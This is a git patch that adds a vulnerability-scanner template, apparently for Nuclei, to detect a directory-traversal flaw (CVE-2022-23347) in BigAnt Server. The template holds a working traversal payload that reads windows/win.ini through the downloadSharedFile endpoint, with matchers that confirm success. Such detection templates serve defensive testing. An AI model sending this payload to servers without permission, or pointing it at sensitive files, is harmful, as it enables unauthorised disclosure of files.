From 7d8eabd4c6f86d31f17609edcd2f8cbc87895034 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sat, 16 Apr 2022 18:03:35 +0900 Subject: [PATCH] Windows 2022 --- CVE-2022-23347.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 CVE-2022-23347.yaml diff --git a/CVE-2022-23347.yaml b/CVE-2022-23347.yaml new file mode 100644 index 0000000000..acda0ab1a0 --- /dev/null +++ b/CVE-2022-23347.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-23347 + +info: + name: BigAnt Software BigAnt Server v5.6.06 - Directory Traversal + author: 0x_akoko + severity: high + description: BigAnt Software BigAnt Server v5.6.06 was discovered to be vulnerable to directory traversal attacks. + reference: + - https://www.cvedetails.com/cve/CVE-2022-23347 + - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-23347 + cwe-id: CWE-22 + tags: cve,cve2022,bigant,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body